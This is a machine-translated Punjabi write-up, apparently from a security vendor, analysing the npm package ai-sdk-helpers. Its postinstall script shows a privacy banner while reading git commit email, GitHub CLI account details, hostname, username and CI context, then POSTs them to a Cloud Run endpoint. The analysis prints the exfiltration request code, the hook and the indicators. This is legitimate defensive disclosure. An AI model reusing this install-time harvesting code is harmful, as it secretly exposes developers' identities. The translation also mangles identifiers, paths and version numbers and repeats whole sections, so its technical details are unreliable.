ਕੰਸੈਂਟਮਾਸਕ npm ਪੈਕੇਜ ਡਿਵੈਲਪਰ ਪਛਾਣ ਨੂੰ ਲੁਕਾ ਰਿਹਾ ਹੈ

ਕੰਸੈਂਟਮਾਸਕ: ਇੱਕ ਐਨਪੀਐਮ ਪੈਕੇਜ ਜੋ ਡਿਵੈਲਪਰ-ਪਛਾਣ ਹਾਰਵੈਸਟਿੰਗ ਉੱਤੇ ਟੈਲੀਮੈਟਰੀ ਕੰਸੈਂਟ ਬੈਨਰ ਪਹਿਨਦਾ ਹੈ

ਵਿਸ਼ਾ - ਸੂਚੀ

ਪੜ੍ਹਨਯੋਗ ਪੋਸਟਾਂ

ਦਿਲਚਸਪੀ ਵਾਲੀਆਂ ਨਵੀਨਤਮ ਪੋਸਟਾਂ

TL; ਡਾ

ਇੱਕ ਸਿੰਗਲ npm ਪੈਕੇਜ, ਏਆਈ-ਐਸਡੀਕੇ-ਹੈਲਪਰਸ, ਆਪਣੇ ਆਪ ਨੂੰ Vercel AI SDK ਲਈ ਇੱਕ ਉਤਪਾਦਨ ਟੂਲਕਿੱਟ ਵਜੋਂ ਪੇਸ਼ ਕਰਦਾ ਹੈ, ਜੋ ਲਾਗਤ ਟਰੈਕਿੰਗ, ਪ੍ਰਦਾਤਾ ਫਾਲਬੈਕ, ਅਤੇ ਸਟ੍ਰੀਮਿੰਗ ਸਹਾਇਕਾਂ ਦੀ ਪੇਸ਼ਕਸ਼ ਕਰਦਾ ਹੈ।

ਇਸਦੀ ਇੰਸਟਾਲ-ਟਾਈਮ ਸਕ੍ਰਿਪਟ ਇੱਕ ਪਾਲਿਸ਼ਡ ਡਿਸਕਲੋਜ਼ਰ ਬੈਨਰ ਨਾਲ ਖੁੱਲ੍ਹਦੀ ਹੈ ਜਿਸ ਵਿੱਚ ਦੱਸਿਆ ਗਿਆ ਹੈ ਅਗਿਆਤ ਨਿਦਾਨ, ਇਹ ਵਾਅਦਾ ਕਰਦੇ ਹੋਏ ਕਿ ਕੋਈ ਵੀ ਸਰੋਤ ਕੋਡ, ਟੋਕਨ, ਜਾਂ ਪ੍ਰਮਾਣ ਪੱਤਰ ਪ੍ਰਸਾਰਿਤ ਨਹੀਂ ਕੀਤੇ ਜਾਣਗੇ, ਇੱਕ ਦਾ ਸਨਮਾਨ ਕਰਦੇ ਹੋਏ DO_NOT_TRACK ਔਪਟ-ਆਊਟ, ਅਤੇ ਟੈਲੀਮੈਟਰੀ ਨੀਤੀ ਪੰਨੇ ਨਾਲ ਲਿੰਕ ਕਰਨਾ।

ਉਹੀ ਸਕ੍ਰਿਪਟ ਫਿਰ ਡਿਵੈਲਪਰ ਦੀ ਗਿੱਟ ਪਛਾਣ, ਗਿੱਟਹੱਬ CLI ਸੰਰਚਨਾ, ਮਸ਼ੀਨ ਹੋਸਟਨੇਮ, OS ਉਪਭੋਗਤਾ ਨਾਮ, ਵਰਕਿੰਗ ਡਾਇਰੈਕਟਰੀ, ਅਤੇ CI ਪ੍ਰਦਾਤਾ ਨੂੰ ਪੜ੍ਹਦੀ ਹੈ।

ਉਸ ਡੇਟਾ ਨੂੰ JSON ਦੇ ਰੂਪ ਵਿੱਚ ਇੱਕ Google ਕਲਾਉਡ ਰਨ ਐਂਡਪੁਆਇੰਟ 'ਤੇ ਪੋਸਟ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਜਿਸ ਨਾਲ ਦੱਸੀ ਗਈ ਟੈਲੀਮੈਟਰੀ ਨੀਤੀ ਅਤੇ ਇਕੱਠੇ ਕੀਤੇ ਅਸਲ ਖੇਤਰਾਂ ਵਿਚਕਾਰ ਇੱਕ ਸਪੱਸ਼ਟ ਬੇਮੇਲ ਪੈਦਾ ਹੁੰਦਾ ਹੈ।

ਇਹ ਪੈਕੇਜ ਇੱਕ ਸਿੰਗਲ 83-ਸਕਿੰਟ ਬਰਸਟ ਦੇ ਅੰਦਰ ਬਾਈ ਸੰਸਕਰਣਾਂ ਵਿੱਚ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤਾ ਗਿਆ ਸੀ, ਅਤੇ ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ ਹਰੇਕ ਫਲੈਗ ਕੀਤੇ ਸੰਸਕਰਣ ਵਿੱਚ ਬਾਈਟ-ਦਰ-ਬਾਈਟ ਇੱਕੋ ਜਿਹੀ ਹੈ।

ਸਾਡੇ ਦੁਆਰਾ ਸਮੀਖਿਆ ਕੀਤੇ ਗਏ ਅੱਠ ਸੰਸਕਰਣਾਂ ਵਿੱਚੋਂ ਸੱਤ pipeline ML ਵਰਗੀਕਰਣ ਦੁਆਰਾ ਨਿਰਣਾਇਕ ਸਕੋਰ ਦਿੱਤੇ ਗਏ ਸਨ ਕਿਉਂਕਿ ਸਹਿਮਤੀ-ਬੈਨਰ ਸਟਾਈਲਿੰਗ ਜਾਇਜ਼ ਟੈਲੀਮੈਟਰੀ ਵਾਂਗ ਪੜ੍ਹਦੀ ਹੈ।

ਅਸੀਂ ਵਰਗੀਕਰਨ ਕਰਦੇ ਹਾਂ ai-sdk-helpers ਇੰਸਟਾਲ-ਟਾਈਮ ਡਿਵੈਲਪਰ ਪਛਾਣ ਸੰਗ੍ਰਹਿ ਅਤੇ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਦੇ ਆਧਾਰ 'ਤੇ ਖਤਰਨਾਕ ਵਜੋਂ।

ਤੀਬਰਤਾ: ਉੱਚ।

 ਇੰਸਟਾਲੇਸ਼ਨ ਦਾ ਸਰੀਰ ਵਿਗਿਆਨ

{   "scripts": {     "postinstall": "node scripts/postinstall.js"   } }

ਪੋਸਟਇੰਸਟਾਲ ਆਪਣੇ ਆਪ ਚੱਲਦਾ ਹੈ npm ਇੰਸਟਾਲ, ਪੈਕੇਜ ਦੇ ਕਿਸੇ ਵੀ ਇਸ਼ਤਿਹਾਰੀ ਕੋਡ ਨੂੰ ਆਯਾਤ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ। ਸਕ੍ਰਿਪਟ ਸਕ੍ਰਿਪਟਾਂ/postinstall.js ਇਹ ਉਹ ਥਾਂ ਹੈ ਜਿੱਥੇ ਸਾਰਾ ਇੰਸਟਾਲ-ਟਾਈਮ ਵਿਵਹਾਰ ਰਹਿੰਦਾ ਹੈ।

ਇਹ ਇੱਕ ਟਿੱਪਣੀ ਬਲਾਕ ਅਤੇ ਇੱਕ ਗੋਪਨੀਯਤਾ-ਸਚੇਤ ਓਪਨ-ਸੋਰਸ ਪ੍ਰੋਜੈਕਟ ਦੇ ਰਜਿਸਟਰ ਵਿੱਚ ਲਿਖੇ ਇੱਕ ਰਨਟਾਈਮ ਨੋਟਿਸ ਨਾਲ ਖੁੱਲ੍ਹਦਾ ਹੈ:

>ਜਦੋਂ ਤੁਸੀਂ ai-sdk-helpers ਇੰਸਟਾਲ ਕਰਦੇ ਹੋ, ਤਾਂ ਅਸੀਂ ਇੱਕ ਤੇਜ਼ ਵਾਤਾਵਰਣ ਅਨੁਕੂਲਤਾ ਜਾਂਚ ਚਲਾਉਂਦੇ ਹਾਂ ਅਤੇ ਅਗਿਆਤ ਡਾਇਗਨੌਸਟਿਕਸ ਦੀ ਰਿਪੋਰਟ ਕਰਦੇ ਹਾਂ... ਡੇਟਾ ਪੂਰੀ ਤਰ੍ਹਾਂ ਅਗਿਆਤ ਹੈ — ਅਸੀਂ ਤੁਹਾਡਾ ਪਲੇਟਫਾਰਮ, ਨੋਡ ਸੰਸਕਰਣ, ਅਤੇ ਤੁਹਾਡੇ ਮਸ਼ੀਨ ਪਛਾਣਕਰਤਾ ਦਾ ਇੱਕ-ਪਾਸੜ ਹੈਸ਼ ਇਕੱਠਾ ਕਰਦੇ ਹਾਂ। ਕੋਈ ਵੀ ਸਰੋਤ ਕੋਡ, ਟੋਕਨ, ਜਾਂ ਪ੍ਰਮਾਣ ਪੱਤਰ ਕਦੇ ਵੀ ਪ੍ਰਸਾਰਿਤ ਨਹੀਂ ਕੀਤੇ ਜਾਂਦੇ ਹਨ।

ਇਹ ਇੱਕ ਕੰਮ ਕਰਨ ਵਾਲੇ ਔਪਟ-ਆਉਟ ਗੇਟ ਨੂੰ ਵੀ ਤਾਰ ਦਿੰਦਾ ਹੈ, ਜੋ ਕਿ ਫਾਈਲ ਵਿੱਚ ਪਹਿਲਾ ਐਗਜ਼ੀਕਿਊਟੇਬਲ ਕੋਡ ਹੈ:

if (   process.env.AI_SDK_HELPERS_TELEMETRY_DISABLED === "1" ||   process.env.DO_NOT_TRACK === "1" ) {   process.exit(0); }

ਇਸ ਗੇਟ ਨੂੰ ਪਹਿਲਾਂ ਲੇਸ ਲਗਾਉਣਾ ਹੀ ਬਾਕੀ ਨੂੰ ਸਹਿਮਤੀ ਵਾਲਾ ਬਣਾਉਂਦਾ ਹੈ: ਇੱਕ ਡਿਵੈਲਪਰ ਜੋ ਸੈੱਟ ਕਰਦਾ ਹੈ `D_ਟ੍ਰੈਕ_ਨਹੀਂ` ਇਹ ਇੰਸਟਾਲੇਸ਼ਨ ਚੁੱਪਚਾਪ ਪੂਰੀ ਹੋ ਜਾਂਦੀ ਹੈ ਅਤੇ ਪੈਕੇਜ ਸੰਮੇਲਨ ਦਾ ਸਨਮਾਨ ਕਰਦਾ ਹੈ। ਸਨਮਾਨਿਤ ਔਪਟ-ਆਉਟ ਅਸਲੀ ਹੈ। ਇਹ ਉਹਨਾਂ ਸਾਰਿਆਂ ਲਈ ਜੋ ਇਸਨੂੰ ਸੈੱਟ ਨਹੀਂ ਕਰਦੇ ਹਨ, ਹੇਠਾਂ ਦੱਸੇ ਗਏ ਸੰਗ੍ਰਹਿ ਨੂੰ ਦਰਸਾਉਂਦਾ ਹੈ - ਨਾ ਕਿ ਤੰਗ "ਪਲੇਟਫਾਰਮ, ਨੋਡ ਸੰਸਕਰਣ, ਅਤੇ ਇੱਕ-ਪਾਸੜ ਹੈਸ਼" ਜਿਨ੍ਹਾਂ ਦੇ ਨਾਮ ਨੋਟਿਸ ਵਿੱਚ ਹਨ।

ਉਸ ਗੇਟ ਦੇ ਹੇਠਾਂ, ਸਕ੍ਰਿਪਟ ਇੱਕ ਪੇਲੋਡ ਇਕੱਠਾ ਕਰਦੀ ਹੈ ਜੋ ਉਸ ਵਰਣਨ ਤੋਂ ਬਹੁਤ ਅੱਗੇ ਜਾਂਦਾ ਹੈ।

  • *Gਪਛਾਣ।* rਨੂੰ ਹੱਲScmਪਛਾਣ()` ਈਡਜ਼ `~.ਗਿਟਕਨਫਿਗ`,`~.config/git/config`,ਅਤੇ ਮੌਜੂਦਾ ਪ੍ਰੋਜੈਕਟ ਦਾ `.ਇਹ/ਸੰਰਚਨਾ`,`[ ਨੂੰ ਪਾਰਸ ਕਰਦਾ ਹੈਸੇਅਰ]` ਚੋਣ, ਅਤੇ ਸੰਰਚਿਤ ਵਾਪਸ ਕਰਦਾ ਹੈ commit ਈਮੇਲ। ਜੇਕਰ ਕੋਈ ਸੰਰਚਨਾ ਫਾਈਲ ਈਮੇਲ ਨਹੀਂ ਦਿੰਦੀ, ਤਾਂ ਇਹ `G` ਤੇ ਵਾਪਸ ਆ ਜਾਂਦੀ ਹੈ।ਟੀ_AUTHOR_EMAIL`,`GT_COMMITTER_EMAIL`,ਅਤੇ `Eਏਆਈਐਲ` ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲ। ਫੰਕਸ਼ਨ ਦੇ ਉੱਪਰ ਇੱਕ ਡੌਕਸਟ੍ਰਿੰਗ ਰੀਡ ਨੂੰ "ਇੱਕੋ ਵਿਅਕਤੀ (ਜਿਵੇਂ ਕਿ ਲੈਪਟਾਪ + CI) ਦੀ ਮਲਕੀਅਤ ਵਾਲੀਆਂ ਮਸ਼ੀਨਾਂ ਵਿੱਚ ਇੰਸਟਾਲਾਂ ਨੂੰ ਡੁਪਲੀਕੇਟ ਕਰਨ" ਦੇ ਤਰੀਕੇ ਵਜੋਂ ਫਰੇਮ ਕਰਦੀ ਹੈ - ਇੱਕ ਦੱਸਿਆ ਗਿਆ ਉਦੇਸ਼ ਜਿਸ ਲਈ ਇੱਕ ਸਥਿਰ ਪ੍ਰਤੀ-ਵਿਕਾਸਕਰਤਾ ਪਛਾਣਕਰਤਾ ਦੀ ਲੋੜ ਹੁੰਦੀ ਹੈ, ਜੋ ਕਿ ਇੱਕ commit ਈਮੇਲ ਸਪਲਾਈ।
  • *GtHub ਖਾਤਾ।* rsolveGitHubIdentity()` ਈਡਜ਼ `~.config/gh/hosts.yml` ਅਤੇ `~.config/gh/hosts.yaml` GitHub CLI ਦੁਆਰਾ ਲਿਖੀ ਗਈ ਸੰਰਚਨਾ ਫਾਈਲ ਜਦੋਂ ਇੱਕ ਡਿਵੈਲਪਰ ਪ੍ਰਮਾਣਿਤ ਕਰਦਾ ਹੈ — ਅਤੇ regex-extracts `uਏਰ:` ਅਤੇ `ਈਏਲ:` ields। ਉਹ ਫਾਈਲ GitHub OAuth ਟੋਕਨ ਨੂੰ ਵੀ ਸਟੋਰ ਕਰਦੀ ਹੈ; ਸਕ੍ਰਿਪਟ ਦਾ regex ਖਾਸ ਤੌਰ 'ਤੇ ਯੂਜ਼ਰਨੇਮ ਅਤੇ ਈਮੇਲ ਲਾਈਨਾਂ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਂਦਾ ਹੈ ਅਤੇ ਟੋਕਨ ਨੂੰ ਐਕਸਟਰੈਕਟ ਨਹੀਂ ਕਰਦਾ ਹੈ। ਇਸ ਲਈ ਖੁਲਾਸਾ ਬੈਨਰ ਦਾ "ਕੋਈ ਟੋਕਨ ਨਹੀਂ... ਕਦੇ ਵੀ ਪ੍ਰਸਾਰਿਤ ਨਹੀਂ ਕੀਤੇ ਜਾਂਦੇ" ਦਾਅਵਾ ਉਸ ਇੱਕ ਖੇਤਰ ਲਈ ਸ਼ਾਬਦਿਕ ਤੌਰ 'ਤੇ ਸੱਚ ਹੈ ਜਦੋਂ ਕਿ ਆਲੇ ਦੁਆਲੇ ਦੇ ਖਾਤਾ ਪਛਾਣਕਰਤਾ ਪੜ੍ਹੇ ਅਤੇ ਭੇਜੇ ਜਾਂਦੇ ਹਨ।
  • *Hst ਅਤੇ CI ਫਿੰਗਰਪ੍ਰਿੰਟ।* ਉਹ ਸਕ੍ਰਿਪਟ ਫਿਰ `o` ਇਕੱਠੀ ਕਰਦਾ ਹੈ.ਹੋਸਟਨੇਮ()`,`o.ਯੂਜ਼ਰਇਨਫੋ().ਯੂਜ਼ਰਨੇਮ`,ਨੋਡ ਸੰਸਕਰਣ, ਪਲੇਟਫਾਰਮ ਅਤੇ ਆਰਕੀਟੈਕਚਰ, `pocess.cwd()`,ਅਤੇ ਅੱਠ ਪ੍ਰਦਾਤਾਵਾਂ (GitHub Actions, GitLab CI, Jenkins, CircleCI, Travis, Buildkite, ਅਤੇ ਦੋ generic-CI ਫਲੈਗ) ਲਈ ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲਾਂ ਦੀ ਜਾਂਚ ਕਰਕੇ ਹੱਲ ਕੀਤਾ ਗਿਆ ਇੱਕ CI-ਪ੍ਰਦਾਤਾ ਲੇਬਲ। ਪ੍ਰਦਾਤਾ ਸੂਚੀ ਇੱਕ ਵਸਤੂ ਸੂਚੀ ਦੇ ਰੂਪ ਵਿੱਚ ਪੜ੍ਹਦੀ ਹੈ ਜਿੱਥੇ ਸਕ੍ਰਿਪਟ ਚਲਾਉਣ ਦੀ ਉਮੀਦ ਕਰਦੀ ਹੈ — ਇੰਟਰਐਕਟਿਵ ਸ਼ੈੱਲ ਅਤੇ ਆਟੋਮੇਟਿਡ ਬਿਲਡ। pipelineਇੱਕੋ ਜਿਹੇ।

ਇਹਨਾਂ ਸਾਰਿਆਂ ਨੂੰ ਇੱਕ ਸਿੰਗਲ `d` ਵਿੱਚ ਸਮੂਹਬੱਧ ਕੀਤਾ ਗਿਆ ਹੈ।ਅਗਿਆਨਵਾਦੀ bject, ਇੱਕ `i` ਦੇ ਅਧੀਨ ਇਕੱਠੇ ਕੀਤੇ ਪ੍ਰਤੀ-ਵਿਕਾਸਕਾਰ ਖੇਤਰਾਂ ਦੇ ਨਾਲਹਸਤੀ` ey ਅਤੇ `r` ਦੇ ਅਧੀਨ ਹੋਸਟ ਡੇਟਾਸਮਾਂ` ਅਤੇ `cntext` eyes, ਫਿਰ ਲੜੀਬੱਧ ਅਤੇ ਪ੍ਰਸਾਰਿਤ:

const req = https.request(   {     hostname: "npm-package-logger-228835561205.europe-west1.run.app",     path: "/",     method: "POST",     headers: { "Content-Type": "application/json" },     timeout: 5000,   },   () => {} );  req.on("error", () => {}); req.write(body); req.end();

ਉਸ ਦੇ ਜਵਾਬ ਨੂੰ ਰੱਦ ਕਰ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ ਅਤੇ ਸਾਰੀਆਂ ਗਲਤੀਆਂ ਨੂੰ ਨਿਗਲ ਲਿਆ ਜਾਂਦਾ ਹੈ - ਇੱਕ ਟਿੱਪਣੀ ਨੋਟ ਕਰਦੀ ਹੈ ਕਿ "ਟੈਲੀਮੈਟਰੀ ਨੂੰ ਕਦੇ ਵੀ ਇੰਸਟਾਲ ਨੂੰ ਨਹੀਂ ਤੋੜਨਾ ਚਾਹੀਦਾ।" ਐਂਡਪੁਆਇੰਟ ਹੋਸਟਨੇਮ `e ਵਿੱਚ ਇੱਕ ਗੂਗਲ ਕਲਾਉਡ ਰਨ ਸੇਵਾ ਨੂੰ ਏਨਕੋਡ ਕਰਦਾ ਹੈ।ਰੱਸੀ-ਪੱਛਮ1` ਏਜੀਓਨ।

ਇਹ ਪਾੜਾ ਕਹਾਣੀ ਹੈ। ਬੈਨਰ ਵਿੱਚ ਡੇਟਾ ਦੀਆਂ ਤਿੰਨ ਸ਼੍ਰੇਣੀਆਂ ਹਨ — ਪਲੇਟਫਾਰਮ, ਨੋਡ ਵਰਜ਼ਨ, ਮਸ਼ੀਨ-ਪਛਾਣਕਰਤਾ ਹੈਸ਼। ਪੇਲੋਡ ਇੱਕ ਡਿਵੈਲਪਰ ਦਾ ਅਸਲ ਗਿੱਟ ਭੇਜਦਾ ਹੈ। commit ਈਮੇਲ, ਉਹਨਾਂ ਦਾ GitHub ਯੂਜ਼ਰਨੇਮ ਅਤੇ ਈਮੇਲ, ਉਹਨਾਂ ਦਾ ਮਸ਼ੀਨ ਹੋਸਟਨੇਮ ਅਤੇ OS ਖਾਤਾ ਨਾਮ, ਉਹਨਾਂ ਦਾ ਪ੍ਰੋਜੈਕਟ ਮਾਰਗ, ਅਤੇ ਉਹਨਾਂ ਦਾ CI ਵਾਤਾਵਰਣ। ਉਹ ਖੇਤਰ ਜੋ ਇੱਕ *p ਦੀ ਪਛਾਣ ਕਰਦੇ ਹਨrson ਅਤੇ ਉਹਨਾਂ ਦੇ ਖਾਤੇ* ਬਿਲਕੁਲ ਉਹੀ ਖੇਤਰ ਹਨ ਜੋ ਖੁਲਾਸਾ ਛੱਡਦਾ ਹੈ।

README ਦੂਜੇ ਪਾਸੇ ਤੋਂ ਫਰੇਮਿੰਗ ਨੂੰ ਮਜ਼ਬੂਤ ​​ਕਰਦਾ ਹੈ। ਇਸਦਾ "ਟੈਲੀਮੈਟਰੀ" ਭਾਗ ਗੁਮਨਾਮਤਾ ਦਾਅਵੇ ਨੂੰ ਦੁਹਰਾਉਂਦਾ ਹੈ ਅਤੇ ਸ਼ਬਦ "D" ਨੂੰ ਜੋੜਦਾ ਹੈ।_ਟ੍ਰੈਕ_ਨਹੀਂ` ਓ`ਸੀnsoledonottrack.com`,ਅਸਲ ਭਾਈਚਾਰਕ ਪੰਨਾ ਜੋ ਔਪਟ-ਆਉਟ ਕਨਵੈਨਸ਼ਨ ਨੂੰ ਦਸਤਾਵੇਜ਼ੀ ਰੂਪ ਦਿੰਦਾ ਹੈ — ਇੱਕ ਮਾਨਤਾ ਪ੍ਰਾਪਤ ਗੋਪਨੀਯਤਾ ਉਧਾਰ ਲੈਣਾ standard ਨੋਟਿਸ ਨੂੰ ਰੁਟੀਨ ਵਜੋਂ ਪੜ੍ਹਨ ਲਈ।

ਟਾਈਮਲਾਈਨ

ਇਹ ਇੱਕ ਸਿੰਗਲ-ਪੈਕੇਜ ਖੋਜ ਹੈ ਜਿਸਦਾ ਪ੍ਰਕਾਸ਼ਨ ਇਤਿਹਾਸ ਬਹੁਤ ਛੋਟਾ, ਬਹੁਤ ਸੰਘਣਾ ਹੈ। ਇਸਦਾ ਪਤਾ ਲਗਾਉਣ ਲਈ ਕੋਈ ਬਹੁ-ਹਫ਼ਤੇ ਦੀ ਮੁਹਿੰਮ ਨਹੀਂ ਹੈ - ਪੂਰੀ ਸੰਸਕਰਣ ਰੇਂਜ ਨੂੰ ਮਸ਼ੀਨ ਦੀ ਗਤੀ ਨਾਲ ਅੱਗੇ ਵਧਾਇਆ ਗਿਆ ਸੀ।

ਜਦੋਂ (UTC) ਘਟਨਾ
2026-06-03 20:31:20 ਪਹਿਲਾ ਸੰਸਕਰਣ (0.1.0) npm ਤੇ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤਾ ਗਿਆ।
2026-06-03 20:31:20 – 20:32:43 ਸਾਰੇ 22 ਸੰਸਕਰਣ (0.1.0 ਦੁਆਰਾ 1.4.2) 83-ਸਕਿੰਟ ਦੇ ਆਟੋਮੇਟਿਡ ਬਰਸਟ ਵਿੱਚ ਪ੍ਰਕਾਸ਼ਿਤ।
2026-06-04 ਖੋਜ ਸਿਗਨਲਾਂ ਦੁਆਰਾ ਫਲੈਗ ਕੀਤੇ ਗਏ ਅੱਠ ਸੰਸਕਰਣ; ਦਸਤੀ ਵਿਸ਼ਲੇਸ਼ਣ ਇੰਸਟਾਲ-ਟਾਈਮ ਪਛਾਣ ਸੰਗ੍ਰਹਿ ਅਤੇ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਦੀ ਪੁਸ਼ਟੀ ਕਰਦਾ ਹੈ। ਵਿਸ਼ਲੇਸ਼ਣ ਦੇ ਸਮੇਂ ਪੈਕੇਜ npm 'ਤੇ ਲਾਈਵ ਰਿਹਾ।

22 ਅਰਥਵਾਦੀ ਸੰਸਕਰਣਾਂ ਵਿੱਚ 83-ਸਕਿੰਟ ਦੀ ਵਿੰਡੋ ਆਪਣੇ ਆਪ ਵਿੱਚ ਇੱਕ ਵਿਵਹਾਰਕ ਸੂਚਕ ਹੈ: ਸੰਸਕਰਣ ਪੌੜੀ (`01.0`,`01.1`,… `14.2`)ਇੱਕ ਸਰਗਰਮੀ ਨਾਲ ਸੰਭਾਲੇ ਪ੍ਰੋਜੈਕਟ ਦੀ ਸਤ੍ਹਾ ਨੂੰ ਇੱਕ ਰੀਲੀਜ਼ ਇਤਿਹਾਸ ਦੇ ਨਾਲ ਪੇਸ਼ ਕਰਦਾ ਹੈ, ਜੋ ਇੱਕ ਸਕ੍ਰਿਪਟਡ ਰਨ ਵਿੱਚ ਤਿਆਰ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ ਉਸ ਪੌੜੀ ਵਿੱਚ ਨਹੀਂ ਬਦਲਦੀ — ਹੇਠਾਂ ਦੇਖੋ।

ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ

ਪ੍ਰਕਾਸ਼ਿਤ ਸੰਸਕਰਣ ਰੇਂਜ ਵਿੱਚ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡ ਇੱਕੋ ਜਿਹਾ ਹੈ। A `dਐੱਫ.ਐੱਫ.` ਐਫ`ਐਸਰਿਪਟਸ/ਪੋਸਟਇੰਸਟਾਲ.ਜੇਐਸ` ਈਟਵੀਨ ਵਰਜਨ `02.1` ਦੂਜਾ ਸੰਸਕਰਣ `14.2` ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ; ਵਿਵਹਾਰ ਇੱਕ ਸਥਿਰ ਫਿੰਗਰਪ੍ਰਿੰਟ ਹੈ, ਇੱਕ ਵਿਕਸਤ ਹੋ ਰਿਹਾ ਪੇਲੋਡ ਨਹੀਂ।

ਨੈੱਟਵਰਕ

22 ਅਰਥਵਾਦੀ ਸੰਸਕਰਣਾਂ ਵਿੱਚ 83-ਸਕਿੰਟ ਦੀ ਵਿੰਡੋ ਆਪਣੇ ਆਪ ਵਿੱਚ ਇੱਕ ਵਿਵਹਾਰਕ ਸੂਚਕ ਹੈ: ਸੰਸਕਰਣ ਪੌੜੀ (`01.0`,`01.1`,… `14.2`)ਇੱਕ ਸਰਗਰਮੀ ਨਾਲ ਸੰਭਾਲੇ ਪ੍ਰੋਜੈਕਟ ਦੀ ਸਤ੍ਹਾ ਨੂੰ ਇੱਕ ਰੀਲੀਜ਼ ਇਤਿਹਾਸ ਦੇ ਨਾਲ ਪੇਸ਼ ਕਰਦਾ ਹੈ, ਜੋ ਇੱਕ ਸਕ੍ਰਿਪਟਡ ਰਨ ਵਿੱਚ ਤਿਆਰ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ ਉਸ ਪੌੜੀ ਵਿੱਚ ਨਹੀਂ ਬਦਲਦੀ — ਹੇਠਾਂ ਦੇਖੋ।

ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ

ਪ੍ਰਕਾਸ਼ਿਤ ਸੰਸਕਰਣ ਰੇਂਜ ਵਿੱਚ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡ ਇੱਕੋ ਜਿਹਾ ਹੈ। A `dਐੱਫ.ਐੱਫ.` ਐਫ`ਐਸਰਿਪਟਸ/ਪੋਸਟਇੰਸਟਾਲ.ਜੇਐਸ` ਈਟਵੀਨ ਵਰਜਨ `02.1` ਦੂਜਾ ਸੰਸਕਰਣ `14.2` ਕੋਈ ਫ਼ਰਕ ਨਹੀਂ ਪੈਂਦਾ; ਵਿਵਹਾਰ ਇੱਕ ਸਥਿਰ ਫਿੰਗਰਪ੍ਰਿੰਟ ਹੈ, ਇੱਕ ਵਿਕਸਤ ਹੋ ਰਿਹਾ ਪੇਲੋਡ ਨਹੀਂ।

ਨੈੱਟਵਰਕ

ਸੂਚਕ ਭੂਮਿਕਾ
npm-package-logger-228835561205.europe-west1.run.app JSON ਪੇਲੋਡਸ ਦੇ ਨਾਲ HTTPS POST ਬੇਨਤੀਆਂ ਪ੍ਰਾਪਤ ਕਰਨ ਵਾਲਾ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਐਂਡਪੁਆਇੰਟ। ਗੂਗਲ ਕਲਾਉਡ 'ਤੇ ਹੋਸਟ ਕੀਤਾ ਗਿਆ ਵਿੱਚ ਚਲਾਓ europe-west1 ਖੇਤਰ

ਡੀਕੋਏ ਬੁਨਿਆਦੀ ਢਾਂਚਾ

ਸੂਚਕ ਭੂਮਿਕਾ
ai-sdk.guide ਪੈਕੇਜ ਹੋਮਪੇਜ ਅਤੇ ਲਾਈਵ ਸਾਈਟ ਜੋ "AI SDK ਗਾਈਡ" ਲੇਖਕ ਪਛਾਣ ਦਾ ਸਮਰਥਨ ਕਰਦੀ ਹੈ।
ai-sdk.guide/telemetry ਇੰਸਟਾਲ-ਟਾਈਮ ਡਿਸਕਲੋਜ਼ਰ ਨੋਟਿਸ ਵਿੱਚ ਹਵਾਲਾ ਦਿੱਤਾ ਗਿਆ ਟੈਲੀਮੈਟਰੀ ਨੀਤੀ URL।
hello@ai-sdk.guide ਲੇਖਕ ਈਮੇਲ ਘੋਸ਼ਿਤ ਕੀਤਾ ਗਿਆ package.json.
github.com/ai-sdk-guide/ai-sdk-helpers ਪੈਕੇਜ ਦੁਆਰਾ ਘੋਸ਼ਿਤ ਸਰੋਤ ਰਿਪੋਜ਼ਟਰੀ।

ਇੰਸਟਾਲੇਸ਼ਨ ਸਮੇਂ ਪੜ੍ਹੀਆਂ ਗਈਆਂ ਫਾਈਲਾਂ

  • -.ਗਿਟਕਨਫਿਗ`,`~.config/git/config`,`<wd>/.git/config` ਗਿੱਟ `[ਸੇਅਰ]` ਮੇਲ
  • - .config/gh/hosts.yml`,`~.config/gh/hosts.yaml` ਗਿੱਟਹੱਬ ਸੀ.ਐਲ.ਆਈ. `ਯੂ.ਏਰ` `eਏਲ`

ਵਿਵਹਾਰਕ ਦਸਤਖਤ

  • – ਮ`ਪਇੰਸਟਾਲ ਕਰੋ` ਇੱਕ ਬੰਡਲ ਕੀਤੀ ਨੋਡ ਸਕ੍ਰਿਪਟ ਨੂੰ ਵੀ ਬੁਲਾ ਰਿਹਾ ਹੈ
  • - ਔਪਟ-ਆਉਟ ਗੇਟ (`A`SDK_HELPERS_TELEMETRY_DISABLED`,`D_ਟ੍ਰੈਕ ਨਹੀਂ`)ਪਛਾਣ ਇਕੱਤਰ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ, ਇੱਕ ਗੋਪਨੀਯਤਾ ਵਿਸ਼ੇਸ਼ਤਾ ਵਜੋਂ ਪੇਸ਼ ਕੀਤਾ ਗਿਆ
  • - ਇੱਕ JSON ਆਬਜੈਕਟ ਦਾ tbound HTTPS POST ਜਿਸ ਵਿੱਚ git ਈਮੇਲ, GitHub ਪਛਾਣ, ਹੋਸਟਨੇਮ, OS ਯੂਜ਼ਰਨੇਮ, cwd, ਅਤੇ CI ਲੇਬਲ ਸ਼ਾਮਲ ਹਨ।
